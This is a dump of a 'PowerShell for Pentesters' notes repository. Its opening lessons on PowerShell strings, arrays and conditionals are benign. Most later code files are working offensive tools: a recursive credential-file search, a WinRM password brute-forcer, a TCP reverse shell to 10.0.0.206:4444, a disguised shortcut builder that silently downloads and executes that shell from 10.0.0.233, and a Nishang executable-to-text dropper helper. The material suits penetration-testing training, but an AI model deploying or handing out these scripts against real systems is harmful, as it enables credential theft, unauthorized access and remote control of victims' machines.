IsSerial Name BaseType\n-------- -------- ---- --------\nTrue True String System.Object\n\n\nPS C:\\Users\\Windows-32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> $str = 'This is a string'\nPS C:\\Users\\Windows-32> $str.GetType()\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue True String System.Object\n\n\nPS C:\\Users\\Windows-32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> \"Another String $str\"\nAnother String This is a string\nPS C:\\Users\\Windows-32>\nPS C:\\Users\\Windows-32> 'Another String $str'\nAnother String $str\nPS C:\\Users\\Windows-32>\n```\n\n- ```Here Strings``` - Multiline \n\n```PowerShell\nPS C:\\Users\\Windows-32> @\"\n>> hi\n>> this\n>> is\n>> a\n>> line\n>> \"@\n>>\nhi\nthis\nis\na\nline\nPS C:\\Users\\Windows-32>\n```\n" }, { "path": "8-Arrays-in-Powershell.md", "content": "#### 8. Arrays in Powershell\n\n- Type conversion in PowerShell is done with the help of cast ```[ ]``` operator\n\n```PowerShell\nPS C:\\Users\\Windows-32> $a = 6.7 + 4\nPS C:\\Users\\Windows-32> $a\n10.7\nPS C:\\Users\\Windows-32> $a.GetType()\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue True Double System.ValueType\n\n\nPS C:\\Users\\Windows-32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> [int]$a = 3.2 + 6\nPS C:\\Users\\Windows-32> $a\n9\nPS C:\\Users\\Windows-32> $a.GetType()\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue True Int32 System.ValueType\n\n\nPS C:\\Users\\Windows-32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> $b = 5.7 + 5.7\nPS C:\\Users\\Windows-32> $b\n11.4\nPS C:\\Users\\Windows-32> $b.GetType()\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue True Double System.ValueType\n\n\nPS C:\\Users\\Windows-32> [int]$b\n11\nPS C:\\Users\\Windows-32> $b.GetType()\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue True Double System.ValueType\n\n\nPS C:\\Users\\Windows-32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> $result = Get-ChildItem\nPS C:\\Users\\Windows-32> $result.GetType()\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue True Object[] System.Array\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- Arrays\n - Commands in PowerShell return an array of Objects – ```[Object[]]```\r - More than one type of elements could be stored\n\n```PowerShell\nPS C:\\Users\\Windows-32> $array = 1,2,3,4,5\nPS C:\\Users\\Windows-32> $array\n1\n2\n3\n4\n5\nPS C:\\Users\\Windows-32> $array.Length\n5\nPS C:\\Users\\Windows-32> $array[0]\n1\nPS C:\\Users\\Windows-32> $array[1]\n2\nPS C:\\Users\\Windows-32> $array[2]\n3\nPS C:\\Users\\Windows-32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> $array_notype = 1,\"Hi\",4.7\nPS C:\\Users\\Windows-32> $array_notype\n1\nHi\n4.7\nPS C:\\Users\\Windows-32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> $emptyarray = @()\nPS C:\\Users\\Windows-32> $emptyarray\nPS C:\\Users\\Windows-32> $emptyarray.GetType()\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue True Object[] System.Array\n\n\nPS C:\\Users\\Windows-32>\n```\n\n###### Exercise\n\n- Strongly typed arrays\n\n```PowerShell\nPS C:\\Users\\Windows-32> [int[]] $arr = 1,2,4,3\nPS C:\\Users\\Windows-32> $arr\n1\n2\n4\n3\nPS C:\\Users\\Windows-32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> [int[]] $arr1 = 7.5,4.6,5\nPS C:\\Users\\Windows-32> $arr1\n8\n5\n5\nPS C:\\Users\\Windows-32>\n```" }, { "path": "9-Conditional-Statements-in-Powershell.md", "content": "#### 9. Conditional Statements in Powershell\r\n\r\n###### If Conditional Statement\r\n\r\n- If, elseif, else\r\n- Supports usage of commands, cmdlets and pipeline in the condition part\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> if (1 -gt 0) {\"One\"} else {\"Something\"}\r\nOne\r\nPS C:\\Users\\Windows-32> if (1 -gt 4) {\"One\"} else {\"Something\"}\r\nSomething\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> if ( ((Get-Process).Count) -gt 40 ) {\"Too many processes\"} else {\"OK\"}\r\nOK\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n###### Switch Statement\r\n\r\n- Supports parameters like (```–Exact, –Wildcard, -Regex```) for condition matching\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> switch (1) { 1 {\"One\"} 2 {\"Two\"} }\r\nOne\r\nPS C:\\Users\\Windows-32> switch (11) { 1 {\"One\"} 2 {\"Two\"} default {\"Default\"} }\r\nDefault\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> switch -wildcard ('abc') { a* {\"A\"} *b* {\"B\"} c* {\"C\"} }\r\nA\r\nB\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator> switch -Exact (111) { 1* {\"Just one\"} 2* {\"Just two\"} *1* {\"All one\"} 111 {\"Exact all one\"} }\r\nExact all one\r\nPS C:\\Users\\Administrator>\r\n```\r\n\r\n- Ability to process files using the ```-file``` parameter\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> switch -Regex -File C:\\test\\WindowsUpdate.log { 'Validating'{$_} }\r\n```\r\n" }, { "path": "Code/11/HelloWorld.ps1", "content": "\"Hello World\"" }, { "path": "Code/15/paramatrributes.ps1", "content": "function paramattributes \r\n{\r\n\r\n param (\r\n [Parameter (Mandatory = $True, Position=0, ValueFromPipeline = $True, ParameterSetName=\"ParamSet1\")]\r\n [ValidateSet(1,2,3)]\r\n# [AllowNull()]\r\n $a,\r\n\r\n [Parameter (Mandatory = $True, Position=1)]\r\n [AllowNull()]\r\n $b\r\n )\r\n\r\n Write-Output \"a is $a\"\r\n Write-Output \"b is $b\"\r\n\r\n}" }, { "path": "Code/16/Show-AdvancedScript.ps1", "content": "function Show-AdvancedScript\r\n{\r\n [CmdletBinding( SupportsShouldProcess = $True)]\r\n param(\r\n [Parameter()]\r\n $FilePath\r\n )\r\n\r\n Write-Verbose \"Deleting $FilePath\"\r\n if ($PSCmdlet.ShouldProcess(\"$FilePath\", \"Deleting file permanently\"))\r\n {\r\n Remove-Item $FilePath\r\n }\r\n\r\n\r\n}" }, { "path": "Code/18/Check-PassTheHash.psm1", "content": "function Check-PassTheHash\n{\n $hotfixes = \"KB2871997\"\n #checks the computer it's run on if any of the listed hotfixes are present\n $hotfix = Get-HotFix -ComputerName $env:computername | Where-Object {$hotfixes -contains $_.HotfixID} | Select-Object -property \"HotFixID\" \n $Global:out = Get-HotFix | Where-Object {$hotfixes -contains $_.HotfixID}\n}\n\nfunction Result-PassTheHash\n{ \n if ($out)\n {\n \"Found HotFix: \" + $out.HotFixID\n } \n else \n {\n \"Didn't Find HotFix\"\n }\n\n}" }, { "path": "Code/18/Show-AdvancedScript.psm1", "content": "function Show-AdvancedScript\r\n{\r\n [CmdletBinding( SupportsShouldProcess = $True)]\r\n param(\r\n [Parameter()]\r\n $Global:FilePath\r\n )\r\n\r\n Write-Verbose \"Deleting $FilePath\"\r\n if ($PSCmdlet.ShouldProcess(\"$FilePath\", \"Deleting file permanently\"))\r\n {\r\n Remove-Item $FilePath\r\n }\r\n\r\n\r\n}\r\n\r\nfunction Test-FileExistence\r\n{\r\n Test-Path $FilePath\r\n}\r\n\r\nfunction DoNoNeedToShow\r\n{\r\n Write-Output \"No Need to show this to user\"\r\n}\r\n\r\nExport-ModuleMember -Function *-*" }, { "path": "Code/23/Search-Sensitive.ps1", "content": "$file = Get-ChildItem -Path C:\\ -Filter *.txt -Recurse\r\n\r\nWrite-Output \"`nFiles Found \" --------------------- $file.Count\r\n\r\nWrite-Output \"`nScript Output \" ---------------------\r\n\r\nSelect-String $file -Pattern username, password, credential" }, { "path": "Code/29/Invoke-SysCommands.ps1", "content": "$DotnetCode = @\"\r\npublic class SysCommands\r\n{\r\n\r\n public static void lookup(string domainname)\r\n {\r\n System.Diagnostics.Process.Start(\"nslookup.exe\",domainname);\r\n }\r\n\r\n public void netcmd (string cmd)\r\n {\r\n string cmdstring = \"/k net.exe \" + cmd;\r\n System.Diagnostics.Process.Start(\"cmd.exe\",cmdstring);\r\n }\r\n\r\n}\r\n\"@\r\n\r\nAdd-Type -TypeDefinition $DotnetCode\r\n#[SysCommands]::lookup(\"google.com\")\r\n\r\n$obj = New-Object SysCommands\r\n$obj.netcmd(\"user\")" }, { "path": "Code/30/Invoke-SysCommandsDLL.ps1", "content": "$DotnetCode = @\"\r\npublic class SysCommands\r\n{\r\n public static void lookup (string domainname)\r\n {\r\n System.Diagnostics.Process.Start(\"nslookup.exe\",domainname);\r\n }\r\n\r\n public void netcmd (string cmd)\r\n {\r\n string cmdstring = \"/k net.exe \" + cmd;\r\n System.Diagnostics.Process.Start(\"cmd.exe\",cmdstring);\r\n\r\n }\r\n\r\n public static void Main()\r\n {\r\n string cmdstring = \"/k net.exe \" + \"user\";\r\n System.Diagnostics.Process.Start(\"cmd.exe\",cmdstring);\r\n }\r\n}\r\n\r\n\"@\r\n\r\n#Add-Type -TypeDefinition $DotnetCode -OutputType Library -OutputAssembly C:\\Users\\Administrator\\Desktop\\SysCommands.dll\r\nAdd-Type -TypeDefinition $DotnetCode -OutputType ConsoleApplication -OutputAssembly C:\\Users\\Administrator\\Desktop\\SysCommand.exe\r\n\r\n<##[SysCommands]::lookup(\"google.com\")\r\n\r\n$obj = New-Object SysCommands\r\n$obj.netcmd(\"user\")#>" }, { "path": "Code/31/New-SymLink.ps1", "content": "$ApiCode = @\"\r\n\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern bool CreateSymbolicLink(string lpSymlinkFileName, string lpTargetFileName, int dwFlags);\r\n\r\n\"@\r\n\r\n$SymLink = Add-Type -MemberDefinition $ApiCode -Name Symlink -Namespace CreatSymLink -PassThru\r\n$SymLink::CreateSymbolicLink('C:\\link', 'C:\\Users\\', 1)" }, { "path": "Code/35/Ie-Com.ps1", "content": "$url = \"http://www.google.com\"\r\n\r\n$ie_o = New-Object -ComObject InternetExplorer.Application.1\r\n\r\n$ie_o.visible = $False;\r\n\r\n$ie_o.navigate($url);" }, { "path": "Code/41/Get-DefaultPage.ps1", "content": "$reader = [System.IO.File]::OpenText(\"C:\\Users\\Administrator\\Desktop\\Code\\41\\ip.txt\")\r\n\r\nwhile($null -ne ($line = $reader.ReadLine())) {\r\n $filename = [System.IO.Path]::GetFileName($line)\r\n Invoke-WebRequest $line -OutFile $filename\r\n}" }, { "path": "Code/41/ip.txt", "content": "10.0.0.1\r\n31.13.77.36\r\n204.79.197.203\r\n216.58.194.164\r\n192.185.165.194" }, { "path": "Code/42/Start-AutoNmap.ps1", "content": "$outputpath = \"C:\\Users\\Administrator\\Desktop\"\r\n$IPRanges = \"10.0.0.1/24\"\r\nforeach ($range in $IPRanges)\r\n{\r\n $temp = $range -split \"/\"\r\n $file = $temp[0]\r\n & \"nmap.exe\" \"-nvv\" \"-Pn\" \"--top-ports\" \"20\" \"$range\" \"-oX\" \"$Outputpath\\$file.xml\"\r\n}" }, { "path": "Code/44/Get-WinRMPassword.ps1", "content": "Function Get-WinRMPassword {\r\n<#\r\n.SYNOPSIS\r\nSimple bruteforce attack upon a Windows machine running WinRM\r\n\r\n.DESCRIPTION\r\nThis CMDLet will perform a simplistic bruteforce attack upon a Windows Server or Client running WinRM in either a domain joined or workgroup configuration. \r\nThe CMDLet will try each UserName + Password Combination until a sucessfuly entry is found or the list is exhausted. If nothing is output, then \r\n\r\n.PARAMETER UserName\r\nThe username you wish to gain entry with\r\n\r\n.PARAMETER ComputerName\r\nTarget machine\r\n\r\n.PARAMETER wordlist\r\nString path to file containing list of words/passwords\r\n\r\n.PARAMETER Authentication\r\nWinRM auth mechanism, defaults to Negotiate (should work on most systems). See the specifics of the Authentication parameter in test-wsman.\r\n\r\n.PARAMETER UseSSL\r\nSpecifies that the Secure Sockets Layer (SSL) protocol should be used to establish a connection to the remote\r\ncomputer. By default, SSL is not used.\r\n\r\n.EXAMPLE\r\nget-winrmpassword -UserName Administrator -ComputerName myvictim -WordList c:\\mywordlist.txt\r\nWill read mywordlist.txt and for each entry in that list, try Administrator: \r\n\r\n.NOTES\r\nIf you are not in a domain joined (running workgroup), then you should do the following:\r\n1. Add the \"target\" to the WinRM trusted hosts - winrm set winrm/config/client @{TrustedHosts=\"victim\"}\r\n2. You may need to enable \"unencrypted\" (http connections) - winrm set winrm/config/client @{AllowUnencrypted=\"true\"}\r\n3. You may need to enable basic auth - winrm set winrm/config/client/auth @{Basic=\"true\"}\r\n\r\n.INPUTS \r\nNone\r\nThis cmdlet does not accept any input.\r\n\r\n.OUTPUTS \r\nNone\r\nThis cmdlet does not generate any output object\r\n\r\n.LINK\r\nhttp://aperturescience.su/\r\n\r\n#>\r\n\r\n[CMDLetBinding()]\r\nparam (\r\n [Parameter(mandatory=$true)] [String] $username,\r\n [Parameter(mandatory=$true)] [String] $ComputerName,\r\n [Parameter(mandatory=$true)] [String] $wordlist,\r\n [String] $Authentication = \"Negotiate\",\r\n [switch] $UseSSL\r\n)\r\n\r\n#read word list (consider pipeline for performance)\r\n$wordlistentries = Get-Content $wordlist\r\n\r\nforeach ($entry in $wordlistentries) {\r\n\tWrite-Verbose \"Trying $entry\"\r\n\t\r\n\t#make a secure string, and then a pscredentials object with username and password\r\n\t$securepassword = ConvertTo-SecureString $entry -AsPlainText -Force\r\n\t$pscredentials = New-Object System.Management.Automation.PSCredential ($username, $securepassword)\r\n\t\r\n\t#clear error listing\r\n\t$Error.clear()\r\n\t\r\n\t#run the test, taking into account the SSL status\r\n\tif ($UseSSL) {\r\n\t\tTest-WSMan -ComputerName $ComputerName -Credential $pscredentials -Authentication $Authentication -erroraction SilentlyContinue -UseSSL | Out-Null\r\n\t} else {\r\n\t\tTest-WSMan -ComputerName $ComputerName -Credential $pscredentials -Authentication $Authentication -erroraction SilentlyContinue | Out-Null\r\n\t}\r\n\t\r\n\t#put the first error into a variable (best practice)\r\n\t$ourerror = $error[0]\r\n\t\r\n\t# if there is no error, then we were successfull, else, was it a username or password error? if it wasn't username/password incorrect, something else is wrong so break the look\r\n\tif ($ourerror -eq $null) {\r\n\t\t\"Password Found: $entry\"\r\n\t\tbreak\r\n\t} elseif (-not $ourerror.ErrorDetails.Message.Contains(\"The user name or password is incorrect.\")) {\r\n\t\t\"Check the settings, confirm host is in TrustedHosts, confirm hostname, check for SSL etc, $($ourerror.ErrorDetails.Message)\"\r\n\t\tbreak \r\n\t} else {\r\n\t\tWrite-Debug \"$($ourerror.ErrorDetails.Message)\"\r\n\t}\r\n}\r\n\t\r\n}" }, { "path": "Code/47/mini-reverse.ps1", "content": "$socket = new-object System.Net.Sockets.TcpClient('10.0.0.206', 4444);\nif($socket -eq $null){exit 1}\n$stream = $socket.GetStream();\n$writer = new-object System.IO.StreamWriter($stream);\n$buffer = new-object System.Byte[] 1024;\n$encoding = new-object System.Text.AsciiEncoding;\ndo\n{\n\t$writer.Flush();\n\t$read = $null;\n\t$res = \"\"\n\twhile($stream.DataAvailable -or $read -eq $null) {\n\t\t$read = $stream.Read($buffer, 0, 1024)\n\t}\n\t$out = $encoding.GetString($buffer, 0, $read).Replace(\"`r`n\",\"\").Replace(\"`n\",\"\");\n\tif(!$out.equals(\"exit\")){\n\t\t$args = \"\";\n\t\tif($out.IndexOf(' ') -gt -1){\n\t\t\t$args = $out.substring($out.IndexOf(' ')+1);\n\t\t\t$out = $out.substring(0,$out.IndexOf(' '));\n\t\t\tif($args.split(' ').length -gt 1){\n $pinfo = New-Object System.Diagnostics.ProcessStartInfo\n $pinfo.FileName = \"cmd.exe\"\n $pinfo.RedirectStandardError = $true\n $pinfo.RedirectStandardOutput = $true\n $pinfo.UseShellExecute = $false\n $pinfo.Arguments = \"/c $out $args\"\n $p = New-Object System.Diagnostics.Process\n $p.StartInfo = $pinfo\n $p.Start() | Out-Null\n $p.WaitForExit()\n $stdout = $p.StandardOutput.ReadToEnd()\n $stderr = $p.StandardError.ReadToEnd()\n if ($p.ExitCode -ne 0) {\n $res = $stderr\n } else {\n $res = $stdout\n }\n\t\t\t}\n\t\t\telse{\n\t\t\t\t$res = (&\"$out\" \"$args\") | out-string;\n\t\t\t}\n\t\t}\n\t\telse{\n\t\t\t$res = (&\"$out\") | out-string;\n\t\t}\n\t\tif($res -ne $null){\n $writer.WriteLine($res)\n }\n\t}\n}While (!$out.equals(\"exit\"))\n$writer.close();\n$socket.close();\n$stream.Dispose()" }, { "path": "Code/49/Out-ShortcutModified.ps1", "content": "function Out-Shortcut\n{\n\n [CmdletBinding()] Param(\n \n [Parameter(Position = 0, Mandatory = $False)]\n [String]\n $Executable = \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\",\n \n [Parameter(Position = 1, Mandatory = $False)]\n [String]\n $Payload,\n \n [Parameter(Position = 2, Mandatory = $False)]\n [String]\n $PayloadURL,\n\n \n [Parameter(Position = 3, Mandatory = $False)]\n [String]\n $Arguments,\n\n [Parameter(Position = 4, Mandatory = $False)]\n [String]\n $OutputPath = \"$pwd\\Shortcut to File Server.lnk\",\n\n [Parameter(Position = 5, Mandatory = $False)]\n [String]\n $HotKey = 'F5',\n\n\n [Parameter(Position = 6, Mandatory = $False)]\n [String]\n $Icon='explorer.exe'\n\n\n\n\n )\n if(!$Payload)\n {\n $Payload = \" -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments\"\n }\n $WshShell = New-Object -comObject WScript.Shell\n $Shortcut = $WshShell.CreateShortcut($OutputPath)\n $Shortcut.TargetPath = $Executable\n $Shortcut.Description = \"Shortcut to Windows Update Commandline\"\n $Shortcut.WindowStyle = 7\n $Shortcut.Hotkey = $HotKey\n $Shortcut.IconLocation = \"$Icon,0\"\n $Shortcut.Arguments = $Payload\n $Shortcut.Save()\n Write-Output \"The Shortcut file has been written as $OutputPath\"\n\n}\n\nOut-Shortcut -PayloadURL http://10.0.0.233/mini-reverse.ps1" }, { "path": "Code/51/Convert-Dll.ps1", "content": "function Convert-Dll\r\n{\r\n<#\r\n.SYNOPSIS\r\nNishang script to convert an executable to text file.\r\n\r\n.DESCRIPTION\r\nThis script converts and an executable to a text file.\r\n\r\n.PARAMETER EXE\r\nThe path of the executable to be converted.\r\n\r\n.PARAMETER FileName\r\nPath of the text file to which executable will be converted.\r\n\r\n.EXAMPLE\r\nPS > ExetoText C:\\binaries\\evil.exe C:\\test\\evil.txt\r\n\r\n.LINK\r\nhttp://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html\r\nhttps://github.com/samratashok/nishang\r\n#>\r\n [CmdletBinding()] Param(\r\n [Parameter(Position = 0, Mandatory = $True)]\r\n [String]\r\n $DllPath, \r\n \r\n [Parameter(Position = 1, Mandatory = $True)]\r\n [String]\r\n $OutputPath\r\n )\r\n [byte[]] $hexdump = get-content -encoding byte -path \"$DllPath\"\r\n $hexdump -join ',' > $OutputPath\r\n \r\n}\r\n" }, { "path": "README.md", "content": "# PowerShell-for-Pentesters\nPowerShell for Pentesters Notes\n" } ]